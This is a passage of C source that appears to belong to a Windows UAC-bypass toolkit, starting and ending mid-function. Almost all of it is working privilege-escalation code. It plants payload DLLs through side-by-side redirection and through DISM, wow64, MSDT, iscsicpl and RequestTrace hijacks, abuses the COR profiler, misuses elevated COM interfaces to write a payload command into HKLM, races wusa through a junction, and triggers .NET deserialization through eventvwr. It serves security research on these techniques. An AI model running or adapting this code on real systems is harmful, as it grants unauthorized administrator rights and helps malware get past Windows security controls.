WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;
SIZE_T sz;
LPWSTR lpSxsPath = NULL;
WCHAR szSrc[MAX_PATH * 2], szDst[MAX_PATH * 2];
WCHAR szCurDir[MAX_PATH * 2];
SXS_SEARCH_CONTEXT sctx;
if (lpTargetApplication == NULL)
return STATUS_INVALID_PARAMETER_3;
if (_strlen(lpTargetApplication) > MAX_PATH)
return STATUS_INVALID_PARAMETER_3;
do {
//
// Patch Fubuki to the new entry point
//
if (!supReplaceDllEntryPoint(ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_SXS,
FALSE))
{
break;
}
//common part, locate sxs dll, drop payload to temp
RtlSecureZeroMemory(szSrc, sizeof(szSrc));
RtlSecureZeroMemory(szDst, sizeof(szDst));
sz = UNICODE_STRING_MAX_BYTES;
lpszFullDllPath = (WCHAR*)supVirtualAlloc(
&sz,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
NULL);
if (lpszFullDllPath == NULL)
break;
sctx.DllName = COMCTL32_DLL;
sctx.SxsKey = COMCTL32_SXS;
sctx.FullDllPath = lpszFullDllPath;
if (!sxsFindLoaderEntry(&sctx))
break;
lpszDirectoryName = _filename(lpszFullDllPath);
if (lpszDirectoryName == NULL)
break;
sz = PAGE_SIZE + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
lpSxsPath = (LPWSTR)supVirtualAlloc(
&sz,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
NULL);
if (lpSxsPath == NULL)
break;
_strcpy(lpSxsPath, g_ctx->szSystemDirectory);
if (lpTargetDirectory) {
_strcat(lpSxsPath, lpTargetDirectory);
}
_strcpy(szDst, lpTargetApplication);
//
// Workaround for consent, so it won't ban itself.
// Create all files and target directories with fake root name.
// Next when all fileop is done, rename fake root to real.
//
if (bConsentItself) {
_strcat(szDst, FAKE_LOCAL_SXS);
}
else {
_strcat(szDst, LOCAL_SXS);
}
//create local directory
if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, szDst))
break;
//create assembly directory
_strcat(lpSxsPath, szDst);
if (!ucmMasqueradedCreateSubDirectoryCOM(lpSxsPath, lpszDirectoryName))
break;
_strcat(lpSxsPath, TEXT("\\"));
_strcat(lpSxsPath, lpszDirectoryName);
if (!ucmMasqueradedSetObjectSecurityCOM(lpSxsPath,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
T_SDDL_ALL_FOR_EVERYONE))
{
break;
}
//move payload file
GetCurrentDirectory(MAX_PATH * 2, szCurDir);
SetCurrentDirectory(lpSxsPath);
if (!supWriteBufferToFile(COMCTL32_DLL, ProxyDll, ProxyDllSize))
break;
SetCurrentDirectory(szCurDir);
//
// Consent workaround end.
// Restore real directory name.
//
if (bConsentItself) {
_strcpy(lpSxsPath, g_ctx->szSystemDirectory);
if (lpTargetDirectory) {
_strcat(lpSxsPath, lpTargetDirectory);
}
_strcat(lpSxsPath, lpTargetApplication);
_strcat(lpSxsPath, FAKE_LOCAL_SXS);
_strcpy(szDst, lpTargetApplication);
_strcat(szDst, LOCAL_SXS);
if (!ucmMasqueradedRenameElementCOM(lpSxsPath, szDst))
break;
}
//run target process
_strcpy(szDst, g_ctx->szSystemDirectory);
if (lpTargetDirectory) {
_strcat(szDst, lpTargetDirectory);
}
if (lpLaunchApplication) {
_strcat(szDst, lpLaunchApplication);
}
else {
_strcat(szDst, lpTargetApplication);
}
if (supRunProcess2(szDst,
NULL,
NULL,
SW_SHOWNORMAL,
1000))
{
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL);
if (lpSxsPath) supVirtualFree(lpSxsPath, NULL);
return MethodResult;
}
/*
* ucmSXSMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for SXSMethod.
*
*/
BOOL ucmSXSMethodCleanup(
VOID
)
{
WCHAR szBuffer[MAX_PATH * 2];
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, CONSENT_EXE);
_strcat(szBuffer, LOCAL_SXS);
return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
}
/*
* ucmxDisemer
*
* Purpose:
*
* Build parameters to the pkgmgr and force it to start dism.exe.
*
* Note:
* Name is a very original WD behavior signature name.
*
*/
NTSTATUS ucmxDisemer()
{
WCHAR szApplication[MAX_PATH * 2];
WCHAR szParameters[256];
_strcpy(szApplication, g_ctx->szSystemDirectory);
_strcat(szApplication, PKGMGR_EXE);
_strcpy(szParameters, TEXT("/ip"));
_strcat(szParameters, TEXT(" /m:"));
_strcat(szParameters, MYSTERIOUSCUTETHING);
_strcat(szParameters, TEXT(" /quiet"));
if (supRunProcess2(szApplication,
szParameters,
NULL,
SW_HIDE,
SUPRUNPROCESS_TIMEOUT_DEFAULT))
{
return STATUS_SUCCESS;
}
return STATUS_ACCESS_DENIED;
}
#define DISM_DLL_NAMES 2
LPCWSTR g_DismTargets[DISM_DLL_NAMES] = {
DISMCORE_DLL,
APISET_KERNEL32LEGACY
};
/*
* ucmDismMethodCleanup
*
* Purpose:
*
* Cleanup routine for Dism method.
*
*/
VOID ucmDismMethodCleanup(VOID)
{
DWORD i, cNames;
cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;
for (i = 0; i < cNames; i++) {
ucmMethodCleanupSingleItemSystem32(g_DismTargets[i], NULL);
}
}
/*
* ucmDismMethod
*
* Purpose:
*
* Exploit DISM application dll loading scheme.
*
* Dism.exe located in system32 folder while it dlls are in system32\dism
* When loaded dism first attempt to load dlls from system32 folder.
*
* Trigger: pkgmgr.exe
* PkgMgr.exe is autoelevated whitelisted application which is actually just calling Dism.exe
*
*/
NTSTATUS ucmDismMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
DWORD i, cNames;
SIZE_T nLen;
WCHAR szSource[MAX_PATH * 2];
cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;
for (i = 0; i < cNames; i++) {
MethodResult = ucmGenericAutoelevation(NULL,
g_DismTargets[i],
ProxyDll,
ProxyDllSize);
if (NT_SUCCESS(MethodResult)) {
MethodResult = ucmxDisemer();
}
//
// Cleanup temp.
//
if (!NT_SUCCESS(MethodResult)) {
_strcpy(szSource, g_ctx->szTempDirectory);
_strcat(szSource, g_DismTargets[i]);
nLen = _strlen(szSource);
szSource[nLen - 1] = UCM_TRASH_END_CHAR;
DeleteFile(szSource);
}
Sleep(1000);
}
return MethodResult;
}
/*
* ucmWow64LoggerMethod
*
* Purpose:
*
* Bypass UAC using wow64 logger dll and wow64 application.
*
* Trigger: 32bit version of wusa.exe
* Loader will map and call our logger dll during wow64 process initialization.
*
*/
NTSTATUS ucmWow64LoggerMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
WCHAR szTarget[MAX_PATH * 2];
//
// Build target application full path.
// We need autoelevated application from syswow64 folder ONLY.
//
_strcpy(szTarget, USER_SHARED_DATA->NtSystemRoot);
_strcat(szTarget, SYSWOW64_DIR);
_strcat(szTarget, WUSA_EXE);
//
// Attempt to remove payload dll after execution in method.c!PostCleanupAttempt.
// Warning: every wow64 application will load payload code (some will crash).
// Remove file IMMEDIATELY after work.
//
return ucmGenericAutoelevation(szTarget,
WOW64LOG_DLL,
ProxyDll,
ProxyDllSize);
}
/*
* ucmUiAccessMethod
*
* Purpose:
*
* Bypass UAC using uiAccess(true) application.
* Original method source
* https://habrahabr.ru/company/pm/blog/328008/
*
*/
NTSTATUS ucmUiAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
SIZE_T Length;
LPWSTR lpEnv = NULL, lpTargetDll;
UNICODE_STRING uStr = RTL_CONSTANT_STRING(L"ProgramFiles=");
WCHAR szTarget[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
do {
//
// There is no osksupport.dll in Windows 7.
//
if (g_ctx->dwBuildNumber < NT_WIN8_RTM)
lpTargetDll = DUSER_DLL;
else
lpTargetDll = OSKSUPPORT_DLL;
//
// Replace default Fubuki dll entry point with new.
//
if (!supReplaceDllEntryPoint(ProxyDll,
ProxyDllSize,
FUBUKI_EXT_ENTRYPOINT,
FALSE))
{
break;
}
//
// Drop modified Fubuki to the %temp%
//
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx->szTempDirectory);
_strcat(szSource, lpTargetDll);
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize))
break;
//
// Build target path in g_lpIncludePFDirs
//
lpEnv = supQueryEnvironmentVariableOffset(&uStr);
if (lpEnv == NULL)
break;
Length = _strlen(lpEnv);
if ((Length == 0) || (Length > MAX_PATH))
break;
RtlSecureZeroMemory(&szTarget, sizeof(szTarget));
_strncpy(szTarget, MAX_PATH, lpEnv, MAX_PATH);
_strcat(szTarget, TEXT("\\"));
_strcat(szTarget, T_WINDOWSMEDIAPLAYER);
_strcat(szTarget, TEXT("\\"));
//
// In case if Media Player is not installed / available.
//
if (!PathFileExists(szTarget)) {
if (!ucmMasqueradedCreateSubDirectoryCOM(lpEnv, T_WINDOWSMEDIAPLAYER))
break;
}
//
// Copy Fubuki to target directory.
//
if (!ucmMasqueradedMoveFileCOM(szSource, szTarget))
break;
//
// Copy osk.exe to Program Files\Windows Media Player
//
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx->szSystemDirectory);
_strcat(szSource, OSK_EXE);
if (!ucmMasqueradedMoveCopyFileCOM(szSource, szTarget, FALSE))
break;
//
// Run uiAccess osk.exe from Program Files.
//
_strcat(szTarget, OSK_EXE);
if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0)) {
//
// Run eventvwr.exe as final trigger.
// Spawns mmc.exe with eventvwr.msc snap-in.
//
_strcpy(szTarget, g_ctx->szSystemDirectory);
_strcat(szTarget, EVENTVWR_EXE);
if (supRunProcess2(szTarget, NULL, NULL, SW_SHOW, 0))
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
return MethodResult;
}
/*
* ucmSXSDccwMethod
*
* Purpose:
*
* Similar to ucmSXSMethod, except using different target app and dll.
* Dccw idea by Ernesto Fernandez (https://github.com/L3cr0f/DccwBypassUAC)
*
*/
NTSTATUS ucmSXSDccwMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
BOOL bWusaNeedCleanup = FALSE;
HMODULE hGdiPlus = NULL;
WCHAR* lpszFullDllPath = NULL, * lpszDirectoryName = NULL;
SIZE_T sz;
LPWSTR lpSxsPath = NULL, lpEnd;
WCHAR szBuffer[MAX_PATH * 2], szTarget[MAX_PATH * 2];
SXS_SEARCH_CONTEXT sctx;
do {
//
// Check if target app available. Maybe unavailable in server edition.
//
_strcpy(szTarget, g_ctx->szSystemDirectory);
_strcat(szTarget, DCCW_EXE);
if (!PathFileExists(szTarget)) {
MethodResult = STATUS_OBJECT_NAME_NOT_FOUND;
break;
}
//
// Load GdiPlus in our address space to get it full path.
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, GDIPLUS_DLL);
hGdiPlus = LoadLibrary(szBuffer);
if (hGdiPlus == NULL) {
MethodResult = STATUS_DLL_NOT_FOUND;
break;
}
sz = UNICODE_STRING_MAX_BYTES;
lpszFullDllPath = (WCHAR*)supVirtualAlloc(
&sz,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
NULL);
if (lpszFullDllPath == NULL)
break;
sctx.DllName = GDIPLUS_DLL;
sctx.SxsKey = GDIPLUS_SXS;
sctx.FullDllPath = lpszFullDllPath;
if (!sxsFindLoaderEntry(&sctx)) {
MethodResult = STATUS_SXS_KEY_NOT_FOUND;
break;
}
lpszDirectoryName = _filename(lpszFullDllPath);
if (lpszDirectoryName == NULL)
break;
sz = _strlen(lpszDirectoryName) * sizeof(WCHAR);
sz += PAGE_SIZE;
lpSxsPath = (LPWSTR)supVirtualAlloc(
&sz,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
NULL);
if (lpSxsPath == NULL)
break;
//
// Create DotLocal path.
//
_strcpy(lpSxsPath, DCCW_EXE);
_strcat(lpSxsPath, LOCAL_SXS);
_strcat(lpSxsPath, TEXT("\\"));
_strcat(lpSxsPath, lpszDirectoryName);
_strcat(lpSxsPath, TEXT("\\"));
_strcat(lpSxsPath, GDIPLUS_DLL);
//
// Create fake cab file.
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, GDIPLUS_DLL);
bWusaNeedCleanup = ucmCreateCabinetForSingleFile(
szBuffer,
ProxyDll,
ProxyDllSize,
lpSxsPath);
if (!bWusaNeedCleanup)
break;
_strcpy(szBuffer, g_ctx->szSystemDirectory);
lpEnd = _strend(szBuffer);
if (*(lpEnd - 1) == TEXT('\\'))
*(lpEnd - 1) = TEXT('\0');
if (!ucmWusaExtractViaJunction(szBuffer))
break;
Sleep(2000);
//
// Run target.
//
if (supRunProcess(szTarget, NULL))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
//
// Cleanup resources.
//
if (hGdiPlus != NULL) FreeLibrary(hGdiPlus);
if (lpszFullDllPath) supVirtualFree(lpszFullDllPath, NULL);
if (lpSxsPath) supVirtualFree(lpSxsPath, NULL);
if (bWusaNeedCleanup) ucmWusaCabinetCleanup();
return MethodResult;
}
/*
* ucmSXSDccwMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine for SXSDccwMethod.
*
*/
BOOL ucmSXSDccwMethodCleanup(
VOID
)
{
WCHAR szBuffer[MAX_PATH * 2];
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, DCCW_EXE);
_strcat(szBuffer, LOCAL_SXS);
return ucmMasqueradedDeleteDirectoryFileCOM(szBuffer);
}
/*
* ucmCorProfilerMethod
*
* Purpose:
*
* Bypass UAC using COR profiler.
* http://seclists.org/fulldisclosure/2017/Jul/11
*
*/
NTSTATUS ucmCorProfilerMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
SIZE_T sz = 0;
GUID guid;
HKEY hKey = NULL;
LRESULT lResult;
LPOLESTR OutputGuidString = NULL;
WCHAR szBuffer[MAX_PATH * 2], szRegBuffer[MAX_PATH * 4];
do {
//
// Create unique GUID
//
if (CoCreateGuid(&guid) != S_OK)
break;
if (StringFromCLSID(&guid, &OutputGuidString) != S_OK)
break;
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, MYSTERIOUSCUTETHING);
_strcat(szBuffer, TEXT(".dll"));
if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))
break;
supSetEnvVariable(FALSE, NULL, COR_ENABLE_PROFILING, TEXT("1"));
supSetEnvVariable(FALSE, NULL, COR_PROFILER, OutputGuidString);
if (g_ctx->dwBuildNumber >= NT_WIN8_RTM) {
supSetEnvVariable(FALSE, NULL, COR_PROFILER_PATH, szBuffer);
}
else {
//
// On Windows 7 target written on 3+ dotnet, registration required.
//
_strcpy(szRegBuffer, T_REG_SOFTWARECLASSESCLSID);
_strcat(szRegBuffer, OutputGuidString);
_strcat(szRegBuffer, T_REG_INPROCSERVER32);
hKey = NULL;
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, szRegBuffer, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lResult == ERROR_SUCCESS) {
sz = (1 + _strlen(szBuffer)) * sizeof(WCHAR);
lResult = RegSetValueEx(hKey,
TEXT(""),
0,
REG_SZ,
(BYTE*)szBuffer,
(DWORD)sz);
if (lResult == ERROR_SUCCESS) {
_strcpy(szRegBuffer, T_APARTMENT);
sz = (1 + _strlen(szRegBuffer)) * sizeof(WCHAR);
RegSetValueEx(hKey,
T_THREADINGMODEL,
0,
REG_SZ,
(BYTE*)szRegBuffer,
(DWORD)sz);
}
RegCloseKey(hKey);
}
}
//
// Load target app and trigger cor profiler, eventvwr snap-in is written in the dotnet.
//
if (supRunProcess2(MMC_EXE,
EVENTVWR_MSC,
NULL,
SW_SHOW,
SUPRUNPROCESS_TIMEOUT_DEFAULT))
{
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
//
// Cleanup.
//
if (OutputGuidString != NULL) {
supSetEnvVariable(TRUE, NULL, COR_PROFILER, NULL);
CoTaskMemFree(OutputGuidString);
}
supSetEnvVariable(TRUE, NULL, COR_ENABLE_PROFILING, NULL);
if (g_ctx->dwBuildNumber >= NT_WIN8_RTM)
supSetEnvVariable(TRUE, NULL, COR_PROFILER_PATH, NULL);
return MethodResult;
}
/*
* ucmDccwCOMMethod
*
* Purpose:
*
* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
NTSTATUS ucmDccwCOMMethod(
_In_ LPWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r = E_FAIL, hr_init;
SIZE_T sz = 0;
ICMLuaUtil* CMLuaUtil = NULL;
IColorDataProxy* ColorDataProxy = NULL;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
sz = _strlen(lpszPayload);
if (sz == 0) {
MethodResult = STATUS_INVALID_PARAMETER;
break;
}
//
// Create elevated COM object for CMLuaUtil.
//
r = ucmAllocateElevatedObject(
T_CLSID_CMSTPLUA,
&IID_ICMLuaUtil,
CLSCTX_LOCAL_SERVER,
&CMLuaUtil);
if (r != S_OK) {
break;
}
if (CMLuaUtil == NULL) {
break;
}
//
// Write new custom calibrator value to HKLM.
//
r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,
HKEY_LOCAL_MACHINE,
T_DISPLAY_CALIBRATION,
T_CALIBRATOR_VALUE,
lpszPayload);
if (FAILED(r)) {
break;
}
//
// Create elevated COM object for ColorDataProxy.
//
r = ucmAllocateElevatedObject(
T_CLSID_ColorDataProxy,
&IID_IColorDataProxy,
CLSCTX_LOCAL_SERVER,
&ColorDataProxy);
if (r != S_OK) {
break;
}
if (ColorDataProxy == NULL) {
break;
}
//
// Run our "custom calibrator".
//
r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);
if (SUCCEEDED(r))
MethodResult = STATUS_SUCCESS;
Sleep(1000);
//
// Remove calibrator value.
//
CMLuaUtil->lpVtbl->DeleteRegistryStringValue(CMLuaUtil,
HKEY_LOCAL_MACHINE,
T_DISPLAY_CALIBRATION,
T_CALIBRATOR_VALUE);
} while (FALSE);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
if (ColorDataProxy != NULL) {
ColorDataProxy->lpVtbl->Release(ColorDataProxy);
}
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
/*
* ucmJunctionMethod
*
* Purpose:
*
* Bypass UAC using two different steps:
*
* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.
* 2) Disemer
*
* Wusa race condition in combination with junctions found by Thomas Vanhoutte.
*
*/
NTSTATUS ucmJunctionMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
DWORD i, cNames;
LPWSTR lpEnd;
WCHAR szBuffer[MAX_PATH * 2];
//
// Drop payload dll to %temp% and make cab for it.
//
cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;
for (i = 0; i < cNames; i++) {
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, g_DismTargets[i]);
if (ucmCreateCabinetForSingleFile(szBuffer, ProxyDll, ProxyDllSize, NULL)) {
_strcpy(szBuffer, g_ctx->szSystemDirectory);
lpEnd = _strend(szBuffer);
if (*(lpEnd - 1) == TEXT('\\'))
*(lpEnd - 1) = TEXT('\0');
if (ucmWusaExtractViaJunction(szBuffer)) {
//
// Run target.
//
MethodResult = ucmxDisemer();
}
ucmWusaCabinetCleanup();
}
}
#ifdef _DEBUG
supSetGlobalCompletionEvent();
#endif
return MethodResult;
}
/*
* ucmMsdtMethod
*
* Purpose:
*
* Bypass UAC by dll hijack of sdiagnhost.
* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
*
*/
NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOLEAN bCleanupNeeded = FALSE;
UINT i;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
#ifndef _WIN64
NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
#endif
WCHAR szPath[MAX_PATH * 2];
WCHAR szApp[MAX_PATH + 1];
WCHAR szParams[MAX_PATH * 2];
#ifndef _WIN64
if (g_ctx->IsWow64) {
ntStatus = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
#endif
do {
RtlSecureZeroMemory(&szPath, sizeof(szPath));
if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))
break;
supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH);
supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);
if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))
break;
bCleanupNeeded = TRUE;
_strcpy(szApp, g_ctx->szSystemRoot);
supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);
supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);
_strcpy(szParams, TEXT("-path "));
_strcat(szParams, g_ctx->szSystemRoot);
_strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes"));
if (supRunProcess2(szApp,
szParams,
NULL,
SW_HIDE,
10000))
{
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (bCleanupNeeded) {
i = 5;
do {
if (DeleteFile(szPath))
break;
Sleep(1000);
i--;
} while (i);
}
#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif
#ifdef _DEBUG
supSetGlobalCompletionEvent();
#endif
return MethodResult;
}
/*
* ucmDotNetSerialMethod
*
* Purpose:
*
* Bypass UAC using DotNet Deserialization for eventvwr.
*
*/
NTSTATUS ucmDotNetSerialMethod(
_In_ LPWSTR lpszPayload
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HANDLE hProcess = NULL;
PVOID dataBuffer;
DWORD dataSize;
LPWSTR lpAppData = NULL, lpTargetPath = NULL;
SIZE_T memIO;
WCHAR szTarget[MAX_PATH * 2];
do {
//
// Set payload as environment variable.
//
supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload);
//
// Drop RecentViews cache element to %AppData%.
//
if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, 0, NULL, &lpAppData)))
break;
memIO = (MAX_PATH + _strlen(lpAppData)) * sizeof(WCHAR);
lpTargetPath = (LPWSTR)supHeapAlloc(memIO);
if (lpTargetPath == NULL)
break;
_strcpy(lpTargetPath, lpAppData);
_strcat(lpTargetPath, TEXT("\\Microsoft\\Event Viewer\\RecentViews"));
if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {
dataBuffer = (PVOID)g_encodedRecentViewsV2;
dataSize = sizeof(g_encodedRecentViewsV2);
}
else {
dataBuffer = (PVOID)g_encodedRecentViews;
dataSize = sizeof(g_encodedRecentViews);
}
if (!supDecodeAndWriteBufferToFile(lpTargetPath,
(CONST PVOID)dataBuffer,
dataSize,
'zzzz'))
{
break;
}
//
// Run eventvwr.exe as final trigger.
//
_strcpy(szTarget, g_ctx->szSystemDirectory);
_strcat(szTarget, MMC_EXE);
hProcess = supRunProcess3(szTarget, EVENTVWR_MSC, NULL, SW_SHOW);
if (hProcess) {
supWaitForChildProcesses(MMC_EXE, 50 * 1000);
CloseHandle(hProcess);
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
CoTaskMemFree(lpAppData);
if (lpTargetPath) {
DeleteFile(lpTargetPath);
supHeapFree(lpTargetPath);
}
supSetEnvVariable(TRUE, NULL, MYSTERIOUSCUTETHING, NULL);
return MethodResult;
}
/*
* ucmIscsiCplMethodCleanup
*
* Purpose:
*
* Post execution cleanup routine.
*
*/
VOID ucmIscsiCplMethodCleanup(
VOID
)
{
WCHAR szBuffer[MAX_PATH * 2];
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, ISCSIEXE_DLL);
DeleteFile(szBuffer);
}
/*
* ucmIscsiCplMethod
*
* Purpose:
*
* Bypass UAC by dll hijack of iscsicpl.
* https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC
*
*/
NTSTATUS ucmIscsiCplMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL bValueSet = FALSE;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
SIZE_T nLen;
WCHAR* pszOldEnvValue = NULL;
WCHAR szBuffer[MAX_PATH * 2];
#ifndef _WIN64
if (g_ctx->IsWow64) {
MethodResult = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(MethodResult))
return MethodResult;
}
#endif
do {
_strcpy(szBuffer, g_ctx->szTempDirectory);
nLen = _strlen(szBuffer);
if (szBuffer[nLen - 1] == L'\\') {
szBuffer[nLen - 1] = 0;
}
bValueSet = supReplaceEnvironmentVariableValue(NULL,
TEXT("Path"),
REG_EXPAND_SZ,
szBuffer,
(PVOID*)&pszOldEnvValue);
if (!bValueSet)
break;
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, ISCSIEXE_DLL);
if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))
break;
_strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
_strcat(szBuffer, SYSWOW64_DIR);
_strcat(szBuffer, ISCSICPL_EXE);
if (supRunProcess2(szBuffer, NULL, NULL, SW_HIDE, 5000))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (pszOldEnvValue) {
supReplaceEnvironmentVariableValue(NULL,
TEXT("Path"),
REG_EXPAND_SZ,
pszOldEnvValue,
NULL);
supHeapFree(pszOldEnvValue);
}
else {
supRegCurrentUserDeleteSubKeyValue(TEXT("Environment"), TEXT("Path"));
}
#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif
#ifdef _DEBUG
supSetGlobalCompletionEvent();
#endif
return MethodResult;
}
/*
* ucmRequestTraceMethod
*
* Purpose:
*
* Bypass UAC by environment variables hijack and dll planting.
* https://github.com/R41N3RZUF477/RequestTrace_UAC_Bypass
*
*/
NTSTATUS ucmRequestTraceMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL fDirCreated = FALSE, fEnvSet = FALSE;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
SIZE_T PayloadDirNameLen = 0, nLen;
WCHAR szBuffer[MAX_PATH + 1];
WCHAR szPayloadDir[MAX_PATH * 2];
UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);
INPUT inputs[8];
do {
//
// Create destination dir "system32" in %temp%.
//
_strcpy(szPayloadDir, g_ctx->szTempDirectory);
_strcat(szPayloadDir, SYSTEM32_DIR_NAME);
PayloadDirNameLen = _strlen(szPayloadDir);
if (!CreateDirectory(szPayloadDir, NULL)) {
if (GetLastError() != ERROR_ALREADY_EXISTS)
break;
}
fDirCreated = TRUE;
_strcat(szPayloadDir, TEXT("\\"));
_strcat(szPayloadDir, PERFORMANCETRACEHANDLER_DLL);
if (!supWriteBufferToFile(szPayloadDir, ProxyDll, ProxyDllSize))
break;
//
// Set new %SystemRoot% environment variable.
//
_strcpy(szBuffer, g_ctx->szTempDirectory);
nLen = _strlen(szBuffer);
if (szBuffer[nLen - 1] == L'\\') {
szBuffer[nLen - 1] = 0;
}
fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, T_SYSTEMROOT, szBuffer);
if (fEnvSet == FALSE)
break;
supEnumProcessesForSession(NtCurrentPeb()->SessionId,
(pfnEnumProcessCallback)supEnumTaskhostTasksCallback, (PVOID)&uStrTaskhost);
RtlSecureZeroMemory(&inputs[0], sizeof(inputs));
//
// Simulate LSHIFT+LCONTROL+LWIN+T.
//
inputs[0].type = INPUT_KEYBOARD;
inputs[0].ki.wVk = VK_LSHIFT;
inputs[1].type = INPUT_KEYBOARD;
inputs[1].ki.wVk = VK_LCONTROL;
inputs[2].type = INPUT_KEYBOARD;
inputs[2].ki.wVk = VK_LWIN;
inputs[3].type = INPUT_KEYBOARD;
inputs[3].ki.wVk = 'T';
inputs[4].type = INPUT_KEYBOARD;
inputs[4].ki.wVk = 'T';
inputs[4].ki.dwFlags = KEYEVENTF_KEYUP;
inputs[5].type = INPUT_KEYBOARD;
inputs[5].ki.wVk = VK_LWIN;
inputs[5].ki.dwFlags = KEYEVENTF_KEYUP;
inputs[6].type = INPUT_KEYBOARD;
inputs[6].ki.wVk = VK_LCONTROL;
inputs[6].ki.dwFlags = KEYEVENTF_KEYUP;
